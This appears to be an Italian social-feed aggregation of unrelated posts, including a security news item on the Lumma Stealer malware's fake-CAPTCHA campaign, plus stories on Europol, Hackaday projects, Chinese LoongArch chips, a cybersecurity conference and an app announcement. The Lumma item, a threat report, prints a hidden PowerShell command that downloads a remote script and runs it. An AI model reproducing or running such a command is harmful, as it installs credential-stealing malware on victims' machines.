Salta al contenuto principale



Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile


Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.
Una casella di verifica dall’aspetto familiare (Fonte Sophos)
In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.
La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos)
Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.
Flusso di attacco con abuso CAPTCHA (Fonte Sophos)
Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

L'articolo Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile proviene da il blog della sicurezza informatica.



Operazione El Rais. Traffico di migranti gestito da egiziani smantellato dalla nostra Polizia di Stato in un contesto di cooperazione nell'ambito di una Operational Task Force di Europol


È stato estradato in Italia dall’Albania un egiziano arrestato nell’ambito dell’Operazione “El Rais”, condotta dalla Polizia di Stato di Siracusa e dal Servizio Centrale Operativo, coordinata dalla locale Direzione Distrettuale Antimafia (DDA). L’uomo è giunto a bordo di un volo partito da Tirana e atterrato nelle prime ore del pomeriggio presso l’Aeroporto di Fiumicino, scortato dagli agenti del Servizio per la Cooperazione Internazionale di Polizia e successivamente recluso presso la Casa Circondariale di Roma Rebibbia, a disposizione dell’Autorità Giudiziaria.
Si tratta di un ulteriore e significativo risultato ottenuto grazie alla sinergia e collaborazione tra le autorità italiane e quelle albanesi (Dipartimento Polizia Criminale – Forza Operazionale) con il contributo dell’Ufficio dell’Esperto per la Sicurezza operativo in Albania, che consentirà di processare in Italia uno dei componenti della complessa rete criminale dedita al traffico di migranti, operante tra l’Egitto, la Turchia e la Grecia.
L’attività, in particolare, rappresenta un seguito della vasta operazione (denominata “El Rais”) conclusa lo scorso 8 aprile, con l’esecuzione dell’ordinanza di custodia cautelare a carico di 15 egiziani ritenuti appartenenti ad uno dei più articolati e ben organizzati sodalizi dediti al traffico di migranti sulla Rotta del Mediterraneo Orientale, che si stima abbia favorito l’ingresso clandestino in Italia di almeno 3 mila persone, a partire dal 2021 a oggi, con introiti per l’organizzazione criminale di almeno 30 milioni di dollari.

L’indagine ha visto il coinvolgimento di diverse autorità e Forza di Polizia estere (albanesi, tedesche, turche e omanite), coordinate dal Servizio per la Cooperazione Internazionale di Polizia della Direzione Centrale della Polizia Criminale.
L'ordinanza era stata emessa dal Giudice per le Indagini Preliminari presso il Tribunale di Catania a seguito dell’imponente attività investigativa coordinata da questa Procura della Repubblica – Direzione Distrettuale Antimafia, condotta dal Servizio Centrale Operativo (SCO) e dalla Squadra Mobile di Siracusa in stretta sinergia con la Divisione Interpol del Servizio per la Cooperazione Internazionale di Polizia e l’Agenzia Europea EUROPOL nell’ambito dell’Operational Task Force (OTF) del “Mediterraneo orientale“.

Una operational task force di Europol è un gruppo di lavoro temporaneo e flessibile composto da esperti di polizia e investigatori provenienti da diversi paesi europei. Queste task force vengono create per affrontare specifiche minacce criminali transnazionali, come il traffico di droga, il terrorismo, il cybercrimine e altre forme di criminalità organizzata. Le principali caratteristiche di una operational task force di Europol sono:
Composizione flessibile: I membri provengono da diverse agenzie di contrasto al crimine dei paesi UE, a seconda delle esigenze dell'operazione. Obiettivi mirati: Sono create per indagare su specifici casi o fenomeni criminali di rilevanza internazionale. Coordinamento centralizzato: Vengono coordinate da Europol per massimizzare l'efficacia delle operazioni congiunte. Durata limitata: Hanno una durata limitata, attiva solo per il tempo necessario a raggiungere gli obiettivi dell'indagine.

#otf #Europol #serviziocentraleoperativo #sco #servizioperlacooperazioneinternazionaledipolizia #cooperazioneinternazionaledipolizia #direzionecentraledellapoliziacriminale #elrais #UfficiodellEspertoperlaSicurezza #trafficodiesseriumani

@Notizie dall'Italia e dal mondo



The ZX Spectrum Logic Analyzer


We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.

The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.

You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.

[Happy Little Diodes] is a big fan of the [Eldrgusman] design. What we would have given for a logic analyzer like this forty years ago.

youtube.com/embed/IHbIW8pi4Vo?…


hackaday.com/2025/05/12/the-zx…



Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche


Basta Intel, AMD, NVIDIA. ora tutto è realizzato in casa come la soluzione cloud di Inspur, uno dei principali fornitori di infrastrutture server in Cina. L’azienda cinese Loongson ha annunciato un traguardo importante: più di cento prodotti diversi ora funzionano con processori LoongArch.

Progettata per rafforzare l’indipendenza tecnologica del Paese, la piattaforma LoongArch incorpora i migliori sviluppi di MIPS e RISC-V. I microcircuiti creati utilizzando questa tecnologia vengono già integrati in apparecchiature industriali, personal computer e server. Sebbene siano ancora indietro rispetto ai modelli di punta x86 e Arm, stanno rapidamente recuperando terreno.

Lo scorso autunno, le autorità cinesi hanno invitato le aziende locali a scegliere microprocessori prodotti locali, dichiarando inaffidabili quelli esteri. L’elenco attuale dei chip testati non include prodotti AMD e Intel, ma sono comparse due opzioni di uno sviluppatore nazionale.

La paranoia digitale oggi è il nuovo buon senso.

Tuttavia, anche gli utenti più convinti dell’idea di sovranità tecnologica non acquisteranno dispositivi che non supportino il software necessario. Tenendo conto di ciò, l’azienda pubblica sistematicamente un catalogo dei programmi supportati, indicando sia le soluzioni già pronte sia quelle in fase di finalizzazione.

Il nuovo catalogo di aprile è stato integrato con un sistema cloud di Inspur. La versione precedente del documento faceva riferimento alla soluzione completa di Lenovo per i data center.

La reputazione di Inspur è confermata dalla sua collaborazione con i più grandi giganti tecnologici cinesi: Alibaba e Tencent. Dopo che gli Stati Uniti hanno aggiunto l’azienda alla Entity List delle sanzioni nel 2023, la sua capacità di collaborare con partner americani è stata seriamente limitata. Tuttavia, l’azienda serve con successo un’ampia base di clienti nazionali, offrendo sia hardware sia il suo sistema operativo proprietario InCloud OS per l’implementazione di servizi cloud.

L’integrazione di InCloud OS, basata sulle fondamenta di OpenStack, rafforza significativamente la posizione di LoongArch nel segmento dei sistemi ad alto carico. Di particolare interesse è il chip a 64 core recentemente presentato, che ha la capacità di installare due di questi chip in un unico sistema.

Nel mercato interno, l’ingegno tecnologico di Loongson si confronta con gli sviluppi di Alibaba e Huawei. Tuttavia, le loro soluzioni si basano sull’architettura Arm, che nelle attuali realtà geopolitiche potrebbe rivelarsi un punto debole.

Pechino sostiene attivamente i leader tecnologici nazionali sulla scena mondiale, sfruttando la situazione di stallo commerciale con Washington per rafforzare l’immagine di partner affidabile. Questo approccio potrebbe anche aiutare Loongson ad espandere la sua presenza internazionale.

L'articolo Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche proviene da il blog della sicurezza informatica.



RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag


Sabato 9 maggio, al Teatro Italia di Roma, si è chiusa la Red Hot Cyber Conference 2025, l’appuntamento annuale gratuito creato dalla community di RHC dedicato alla sicurezza informatica, alle tecnologie digitali emergenti, ma soprattutto ai giovani, sempre più numerosi ed appassionati ad ogni edizione e alla consapevolezza del rischio.

Massimiliano Brolli, il founder di Red Hot Cyber, ha dedicato moltissimo impegno nella creazione di questo evento e della community, per promuovere una visione etica in un mondo digitale.

Come cita il manifesto di RHC, “dalle ceneri del cyberpunk e dei vecchi gruppi hacker del passato che non si sono mai rassegnati a combattere per un mondo digitalmente più onesto e giusto, questo movimento di frontiera, vuole essere una voce fuori dal coro nel costruire dal basso un cambiamento, cercando di promuovere la cultura dell’hacking interdisciplinare, permettendo così all’Italia di incubare nuovi talenti che in futuro potranno renderci nuovamente protagonisti nella scena internazionale.

I protagonisti del panel: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri e Giuseppe Corasaniti


Protagonisti del panel sono state importanti figure istituzionali, tra cui il prezioso intervento di Ivano Gabrielli, Direttore della Polizia Postale, che ha portato il suo contributo in qualità di massimo responsabile del Servizio Polizia Postale e delle Comunicazioni, con una lunga esperienza nel contrasto al cybercrime e nella protezione delle infrastrutture critiche, Luigi Montuori, Direttore Dipartimento sanità e ricerca presso il Garante per la protezione dei dati personali, l’immancabile Paolo Galdieri, avvocato penalista, Cassazionista e docente universitario di Diritto penale dell’informatica e Giuseppe Corasaniti, ex magistrato e oggi Professore di infromatica guridica ed etica digitale all’Università Mercatorum, le cui interviste esclusive, insieme a quella di Luca Piccinelli, CISO Huawei Italia, Gabriele Faggioli di Clusit e Flavia Rizza sul cyberbullismo, saranno presto disponibili sul canale YouTube di Red Hot Cyber.

Verrà anche pubblicato un video al giorno dell’evento, seguendo il programma della conferenza, insieme alla galleria fotografica di una conferenza che si conferma punto di riferimento della cybersecurity italiana e catalizzatore per le nuove generazioni.

Abbiamo infatti approfondito, con loro temi come la situazione dell’Italia in questo momento storico, del lato oscuro dell’IA, di cyber resilienza e cyber deterrenza, di transizione al Cloud, delle nuove figure emergenti con grandi capacità tecniche nelle indagini informatiche, di software spia, di attacchi APT alle telecomunicazioni ma anche di reti 5g, di Nis2, del confine invisbile tra crimine informatico e cyber terrorismo visto da un ex magistrato e molto altro ancora!

Red Hot Cyber 2025: gli interventi e i workshop


Ma sul palco del Teatro Italia, non sono mancate altre figure di spicco nel panorama della sicurezza informatica, come Aldo Di Mattia, Direttore SSE and Cybersecurity Advisor Italy & Malta che ha parlato della sfida impari tra Infrastrutture critiche e cybercriminali, Sunil Venazini, Principle Sales Engineer, che ha mostrato strategie e strumenti nell’era dell’IA tra attaccanti e difensori, il mitico Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, che ha portato sul palco “La scomoda eredità della filosofia Hippie”. Ma non solo, Donato Onofri, Senior Red Team Engineer Crowdstrike ha parlato al pubblico di “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”, Michele Mezza, giornalista e docente della Federico II di Napoli, autore di Net War, che con il suo intervento ci ha parlato di “informazione come linguaggio della guerra ibrida”, seguiti dai ‘nostri’ Stefano Gazzella, giornalista e Data Protection Officer, con “Cani da Guardia 4.0,Informazione e Divulgazione Cyber” e Pietro Melillo, CISO di Wuerth Italia, con “Un anno di DarkLab tra Intelligence a Threat Actors e non ultimi Agostino Pellegrino, Cyber Security Expert. che con il suo speech “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” ci ha illustrato come una Wi-Fi può venire hackerata, Roberto Camerinesi, ethical hacker e CTO di Cyber Evolution, che ha portato tra il pubblico le nuove frontiere dell’hacking satellitare con “Houston, abbiamo un problema”, ed infine il geniale e divertente Antonio Montillo, ethical hacker e ricercatore di sicurezza, con il suo immancabile cappello da “Malware Chef” che ha condiviso una delle sue migliori ricette: “Come Cucinare Una LLM Backdoor”.

Nella lunga lista poi non si possono dimenticare gli interventi di Luca Almici, CEO di Enterprise con “Log Management e Sicurezza”, Luigi Martire, Cyber Threat Intelligence Analyst di Tinexta con “Threat intelligence e attribution: aaccia agli APT”, Selene Giupponi, Manager Director Europe Resecurity, con “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Questa lunga lista non sarebbe completa senza Nicola Dalla Vecchia, Senior Solutions Engineer, con “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”, Irene Sorani, esperta di sicurezza informatica con “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”, Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, con “Cyber Risk: quanto pensi di conoscerlo?” Giuliano Rulli, COO Oplium Italia con Il lato oscuro del Cloud: i dati sono al sicuro?”, Diego Fasano, CEO di Ermetix con “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati” Dario Pasquini, Andrea Paita, Cybersecurity Services Manager con Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”, Andrea Acito, Manging Director di Digimat con l’attualismo “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva” e Dario Pasquini, Principal Researcher at RSAC, con “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”

L’inaugurazione dell’8 maggio ha coinvolto gli ospiti con i tradizionali workshop ‘hands-n’ realizzati in collaborazione con Accenture Italia, nei quali i partecipanti hanno potuto sperimentare direttamente le tecnologie con esercizi ad hoc mirati a perfezionare le competenze apprese come la creazione di un sistema IA di Visual Object Tracking, come hackerare un sito wordpress oppure entrare nel Dark Web in sicurezza. Si è dato anche spazio anche ad argomenti come il cyberbullismo con Flavia Rizza o la social engineering con la scoperta dei deepfake emergenti.

Red Hot Cyber Conference: la Capture The Flag


Lo stesso giorno è stata inaugurata la terza Capture The Flag (CTF) di Red Hot Cyber, realizzata in collaborazione con CyberSecurityUp di Fata Informatica, Hackmageddon World e la Fondazione Bruno Kessler (FBK), con le challenge relative all’ingegneria sociale. La sfida, che è stata coordinata dagli ethical hacker Antonio Montillo, Vincenzo Alonge, Andrea Tassotti, Thomas Kirschner, il collettivo hacker Hackerwood e il ricercatore di sicurezza Daniele Santoro, ha messo alla dura prova molti partecipanti.

L’obiettivo dei 111 hacker distribuiti in 32 team è stato quello di colpire le infrastrutture critiche di uno stato oltre alla presenza di una bomba da dissinescare.

I vincitori dell’edizione RHC 2025, premiati la sera del 9 maggio, dopo due giorni di straordinario impegno, sono stati gli imbattibili PizzaFeijoda, seguiti dagli emergenti Winnerz e i veterani CarbonHackers.

Ancora una volta la Capture The Flag tra sfide di social engineering, analisi e crittografia, exploit di vulnerabilità, web hacking e altro ancora si è dimostrata un modo per sviluppare le capacità di problem solving, di improvvisazione e creatività, di pensiero critico, spirito di squadra e di strategia difensiva e offensiva, ma soprattutto ad essere stata premiata sono state la tenacia e la perseveranza, doti fondamentale per un hacker, così come per chiunque lavori nel campo della cybersecurity o dell’informatica in generale, perché senza anche il talento più brillante rischierebbe di non arrivare lontano.

Un appuntamento consolidato, giunto alla sua quarta edizione


Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!

L'articolo RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag proviene da il blog della sicurezza informatica.



Semiconductor Simulator Lets You Play IC Designer


For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.

This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.

It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.

Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.

Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.


hackaday.com/2025/05/12/semico…



Once you're matured you will realize that silence is more powerful than proving a point.


L'interesse per l'AI ha media nulla.


Ovvero... da una parte c'è il gruppo di chi è certo sarà il futuro dell'umanità e che grazie a lei supereremo in un attimo tutti i problemi con cui la nostra specie si è dovuta confrontare negli ultimi 10.000 anni e dall'altra il gruppo di quelli che la considerano il Maligno in formato binario.

Tra i due, il (quasi) nulla.

Ora... calcolate la media e ditemi se mi sono sbagliato.




Carla Hayden, la prima bibliotecaria nera del Congresso, è stata licenziata da Trump

La bibliotecaria del Congresso Carla Hayden è stata licenziata all'improvviso dal presidente Donald Trump, nel contesto degli sforzi dell'amministrazione per epurare i dipendenti federali che, a suo dire, si oppongono al suo programma.

Hayden, confermata dal Senato nel 2016, è stata la prima donna e la prima afroamericana a dirigere la Biblioteca del Congresso, che custodisce una vasta collezione di libri, documenti storici e preziosi manufatti del Paese. Il suo licenziamento è avvenuto in seguito alle critiche dell'American Accountability Foundation (AAF), un gruppo di pressione conservatore che ha accusato Hayden e altri funzionari della biblioteca di promuovere libri con "contenuti radicali" e materiale scritto da oppositori di Trump.

"L'attuale #Bibliotecaria del Congresso Carla Hayden è un soggetto woke, anti-Trump e promuove i ragazzi transgender", ha scritto AAF su X, poche ore prima che la notizia del licenziamento di Hayden diventasse pubblica. "È ora di mandarla FUORI e assumere qualcuno nuovo per il lavoro!"

atlantadailyworld.com/2025/05/…

@Politica interna, europea e internazionale

reshared this



Di tanto in tanto, mi rivolgo alla mia gatta Rose chiamandola Fedora, puramente per scherzo. Ma siccome lei puntualmente si gira, ora la mia gatta ha due nomi.
E no, se ve lo foste chiesti, non si gira con qualsiasi nome 😆


Il Ministro Giuseppe Valditara, ha presentato oggi, nel corso della riunione del Consiglio dell’Unione europea dedicata all’Istruzione, la proposta per una raccomandazione europea che scoraggi l’uso degli smartphone in classe in tutte le scuole prima…


Liberato il soldato Edan Alexander, ma a Gaza si continua a morire


@Notizie dall'Italia e dal mondo
Il rilascio del militare israelo-statunitense è un gesto di buona volontà verso Trump. Nella Striscia però nulla cambia. L’Unicef lancia l’allarme: 71.000 bambini rischiano la malnutrizione acuta
L'articolo Liberato il soldato Edan Alexander, ma a Gaza si continua a morire



la pace si ottiene combattendo la violenza, a livello locale, da parte di ognuno si noi, non togliendo le armi. ogni piccolo gesto violento è una piccola guerra, e tanti gesti violenti sono una grande guerra. le armi sono uno strumento come un altro. non è che ferire una persona con le parole necessariamente non è uccidere.



Il PKK depone le armi e si dissolve. E’ la strada giusta la questione curda?


@Notizie dall'Italia e dal mondo
Una svolta che non scioglie i nodi della questione curda in Turchia e nella regione. Incerta la sorte del leader Ocalan in prigione da decenni. Interrogativi sul ruolo delle milizie YPG nel Rojava
L'articolo Il PKK depone le armi e si dissolve. E’ la



sappiamo per certo che le ai sono dei semplici compositori di parole. eppure le persone, che sia a livello di amicizia, oppure professionale, riescono ad apparire (e probabilmente essere) a un livello ancora più basso. macchinette non programmabili che reagiscono a stimoli in modo molto prevedibile. la base di tutto è che è sempre colpa qualsiasi cosa di qualcun altro. secondo la dottrina di alcuni telefilm del genere oltretomba è lo stesso senso di colpa a condannare le persone. e invece io penso che le brave persone, quelle "da paradiso", sono quelle dotate di coscienza, magari eccessiva, che riescono a sentirsi in colpa anche quando non hanno responsabilità. solo reazioni istintive in base a ideologie e credenze a volte vecchie di decenni se non secoli. questo è l'umanità. per chi crede alle anime ormai spesso le persone sono involucri vuoti. io invece parlo genericamente di livello di consapevolezza al di sotto del livello del rumore di qualsiasi segnale, e quindi non rilevabile. l'umanità si sta spegnendo. forse la fuori a giro ci sono già i nostri successori, forse disponibili fa qualche centinaia di migliaia di anni.

reshared this



#USA e #Israele, il cuneo di #Gaza


altrenotizie.org/primo-piano/1…


Dobbiamo riflettere bene su cosa sta succedendo.

Perché se ci siamo (giustamente) indignati quando le big tech statunitensi hanno ritirato le politiche di inclusione, perché dovremmo indignarci meno se la stessa cosa accade in casa nostra?

Quale sarà la prossima azienda a farlo?

Segno, purtroppo, che "il male" non è solo oltreoceano, c'è l'abbiamo qui accanto alla nostra porta, restiamo vigili.

startupitalia.eu/economy/sap-a…

#inclusione #bigtech #tolleranza #lgbt



900 People Are Collectively Driving an 'Internet Roadtrip' on Google Street View#News
#News


Folgiero accelera su difesa e underwater. I numeri del primo trimestre di Fincantieri

@Notizie dall'Italia e dal mondo

Nel primo trimestre del 2025 Fincantieri consolida il proprio ruolo di attore strategico per la sicurezza europea. Il gruppo guidato da Pierroberto Folgiero chiude il periodo con ricavi pari a 2,376 miliardi di euro, in crescita del 35% rispetto allo



Il formato Weimar+ prende forma. Difesa e sicurezza comune fuori dai vincoli Ue

@Notizie dall'Italia e dal mondo

I capi delle diplomazie di sei tra i maggiori Paesi europei – Francia, Germania, Italia, Polonia, Spagna e Regno Unito – insieme all’Alto rappresentante dell’Unione europea, Kaja Kallas, si sono incontrati oggi nella capitale britannica per un vertice incentrato



Republican Senator Mike Lee introduced Interstate Obscenity Definition Act (again) last week, which would criminalize porn at the federal level.#porn #mikelee #law #project2025




Flohra, l’app del riuso, consente di visualizzare le istanze Flohmarkt come Fedimercatino. Ecco come scaricarla


Lei è Flohra, una coccinella molto speciale, ed è la mascotte della nostra appLei è Flohra, una coccinella molto speciale, ed è la mascotte della nostra app

Flohra, l’app Android del riuso, è pronta per essere testata. L’app consente di visualizzare le istanze Flohmarkt come @fedimercatino
Se non hai ancora un account Flohmarkt, puoi sempre utilizzare la comunità Lemmy @Il Mercatino del Fediverso 💵♻️ anche dal tuo account Mastodon
#Flohra è un client open source basato su Kotlin Multiplatform e Compose Multiplatform che consente di accedere alle istanze basate su #Flohmarkt, un ambiente federato sviluppato da @midzer per creare nel #Fediverso un’alternativa etica e federata a eBay.

Gli annunci pubblicati su Flohmarkt sono visibili per tutti gli utenti ch hanno un account sui social del Fediverso, come Mastodon, Friendica, Pixelfed, Misskey o Pleroma

Per il momento Flohra è disponibile solo su Android, e chi vuole istallare l’ultima release alpha può farlo a questo link:

https://codeberg.org/RocketInSpace/Flohra/releases/tag/0.1.0-alpha02

NB: Al momento le funzionalità sono in sola lettura, ma prevediamo implementarne altre a breve.


Per chi è curioso, ecco un po’ di schermate:

Flohra, la schermata iniziale e l’accesso ai contenuti dell’istanza locale o delle istanze federate

Flohra: le funzionalità di scorrimento laterale e la ricerca per tag


Flohra, la schermata dei preferiti (con tanto di scorrimento laterale) e la schermata delle impostazioni


Vuoi segnalare un errore o dare un suggerimento? Scrivici su Friendica, Twitter, Mastodon o sul gruppo telegram Comunicazione Pirata

Segui il canale di InformaPirata


informapirata.it/2025/05/12/fl…


Flohra, l’app del riuso, consente di visualizzare le istanze Flohmarkt come Fedimercatino. Ecco come scaricarla

Ecco un’app open source per vusualizzare gli annunci di prodotti usati attraverso la piattaforma libera e federata Flohmarkt

informapirata.it/2025/05/12/fl…

#Fedimercatino #Fediverso #Flohmarkt #Flohra #Mercatino #Riuso

[ap_content


reshared this



La sicurezza globale in salsa cinese. Cosa dice il nuovo Libro Bianco di Xi Jinping

@Notizie dall'Italia e dal mondo

Il 12 maggio 2025, l’Ufficio Informazioni del Consiglio di Stato cinese ha pubblicato il Libro Bianco sulla “Sicurezza nazionale della Cina nella nuova era”, un documento strategico che delinea le ambizioni e le direttrici della politica di difesa di



Attenzione!


La mia condòmina dell'ultimo piano sta cambiando le finstre, mi sta cadendo in testa di tutto, viti, pezzi di legno, ci manca la finestra intera e sono a posto.


#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


Come le nuove norme UE sulla responsabilità del software stanno ridefinendo la responsabilità del software

La dura realtà dello sviluppo e della distribuzione di software moderni è che molte organizzazioni scendono a compromessi sulla qualità del software per dare priorità alla velocità.

Abbiamo assistito ripetutamente alle disastrose conseguenze di una scarsa garanzia della qualità. L'interruzione di CrowdStrike da 5,5 miliardi di dollari dello scorso anno ha dimostrato quanto possa essere devastante l'effetto di non dare priorità ai test. E con l'Unione Europea che si prepara ad applicare la sua Direttiva sulla responsabilità per danno da prodotti difettosi (PLD) aggiornata alla fine del 2026, ci sono molte nuove regole e responsabilità di cui i produttori di software devono essere consapevoli per ridurre al minimo i rischi di responsabilità associati.

techradar.com/pro/how-the-eus-…

@Informatica (Italy e non Italy 😁)

reshared this



Dal 15 al 19 maggio il #MIM sarà presente al Salone del Libro di Torino!
Nello spazio espositivo del MIM, presso il padiglione Oval, saranno realizzate attività informative per i docenti, gli studenti e le famiglie con un programma di oltre 40 eventi…
#MIM


Mappe – prima parte
freezonemagazine.com/rubriche/…
Le mappe sono in scale precise di centimetri. Le mappe segnano strade, svincoli, ponti. Le mappe hanno colori per indicare la pianura, la collina, la montagna. Le mappe sono divise in quadrati, per trovare un luogo basta incrociare le lettere con i numeri. Le mappe sono chiare, semplici, leggibili. Il mondo esterno invece è concavo, […]
L'articolo Mappe – prima parte proviene da FREE ZONE MAGAZINE
Le mappe sono in


Papa Robert Francis Prevost, un Leone antico per nuovi ponti


@Notizie dall'Italia e dal mondo
Dalla doppia cittadinanza USA-Perù alla promessa di un pontificato di dialogo e giustizia sociale, Leone XIV si presenta come un papa-ponte tra Americhe, memorie del Concilio e sfide del presente, in un Vaticano attraversato da tensioni geopolitiche, scandali e spinte riformatrici




the second #nakba is not a matter of #hostages . it's about #colonialism #apartheid #slaughter #ethniccleansing. consider the huge amount of natural #gas in the Palestinian area of that sea. THAT is one filthy reason of the #genocide . for the israeli leaders and for those who voted & back them, the hostages *must* stay in the hands of #Hamas , so that the indiscriminate #killing can go on. or the #deportation . their project is the complete erasure of the Palestinian people (since 1948).


Dunque, per oggi mi sono già preso del troll e dell'incompetente, e sono solo 10 e mezzo.

Ma sono certo che si possa fare di meglio: scatenatevi!!!

[post, ovviamente, ironico]



Sarah Seltzer – Singer Sisters
freezonemagazine.com/news/sara…
In libreria dal 16 maggio 2025 L’esordio narrativo, sorprendente ed emozionante, di una delle voci più interessanti del nuovo giornalismo culturale americano. Due generazioni di donne a confronto in un’epopea familiare e musicale fatta di passioni, scontri, bugie e segreti e di interrogativi sul ruolo dell’amore e su quello dell’arte La storia inizia a New […]
L'articolo Sarah Seltzer – Singer Sis


Zalando manderà a casa fotografi e modelle?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Il 70% delle immagini editoriali delle campagne di Zalando è stato generato tramite l'intelligenza artificiale, che ora - per risparmiare soldi e tempo - verrà sfruttata anche per replicare modelli e modelle, come già fatto da H&M. Quale sarà

in reply to Informa Pirata

@Informa Pirata

Quindi fanno campagne pubblicitarie (online) presentando capi di abbigliamento inventati, con persone false autogenerate con 6 o più dita per mano, i creativi — che vivono nello stesso piano astrale degli unicorni — avranno 6 mani invece che due alla stessa stregua delle 6 dita invece di 5… 🤦‍♂️